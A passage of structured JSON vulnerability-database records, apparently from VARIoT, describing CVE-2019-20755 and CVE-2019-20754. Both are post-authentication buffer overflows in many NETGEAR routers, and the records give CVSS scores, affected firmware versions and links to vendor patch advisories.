"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015460",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20755",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20755",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015460",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-61061",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1366",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1366"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20755"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "CNVD",
"id": "CNVD-2021-61061"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20755",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-61061",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1366",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1366"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"id": "VAR-202004-0735",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
}
],
"trust": 1.1059655375806452
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
}
]
},
"last_update_date": "2024-11-23T23:08:03.214000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Stack Overflow on Some Routers, Modem Routers, Extenders, and Orbi Satellites, PSV-2018-0053",
"trust": 0.8,
"url": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-61061)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/285351"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115026"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1366"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20755"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000060627/security-advisory-for-post-authentication-stack-overflow-on-some-routers-modem-routers-extenders-and-orbi-satellites-psv-2018-0053"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20755"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1366"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1366"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1366"
},
{
"date": "2020-04-16T22:15:12.930000",
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1366"
},
{
"date": "2024-11-21T04:39:16.770000",
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1366"
}
],
"trust": 0.6
}
}
var-202004-0734
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, it does not correctly verify the data boundary, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0734",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "jndr3000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.32"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.0.10"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "ex7500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "ex7500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "wndr4500v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.72"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7500_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
}
]
},
"cve": "CVE-2019-20754",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2019-20754",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.2,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015459",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CNVD-2021-67658",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20754",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20754",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015459",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20754",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20754",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015459",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-67658",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1365",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1365"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects DGN2200 before 1.0.0.58, DGN2200B before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.80, D6220 before 1.0.0.44, EX7000 before 1.0.0.66, EX6200 before 1.0.3.88, EX6150 before 1.0.0.42, EX7500 before 1.0.0.46, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900P before 1.4.0.10, R8000P before 1.4.0.10, R7900 before 1.0.2.16, R7000P before 1.3.1.44, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.1.44, R7000 before 1.0.9.32, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.54. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR EX7000, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, it does not correctly verify the data boundary, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20754"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "CNVD",
"id": "CNVD-2021-67658"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20754",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-67658",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1365",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1365"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"id": "VAR-202004-0734",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
}
],
"trust": 1.0623450257142857
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
}
]
},
"last_update_date": "2024-11-23T22:37:25.592000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Buffer Overflow on Some Routers, Modem Routers, and Extenders, PSV-2018-0054",
"trust": 0.8,
"url": "https://kb.netgear.com/000060628/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Modem-Routers-and-Extenders-PSV-2018-0054"
},
{
"title": "Patch for Buffer overflow vulnerabilities in multiple NETGEAR products (CNVD-2021-67658)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/289166"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115025"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-67658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1365"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015459"
},
{
"db": "NVD",
"id": "CVE-2019-20754"
}
]
},
"references": {
"@context": {
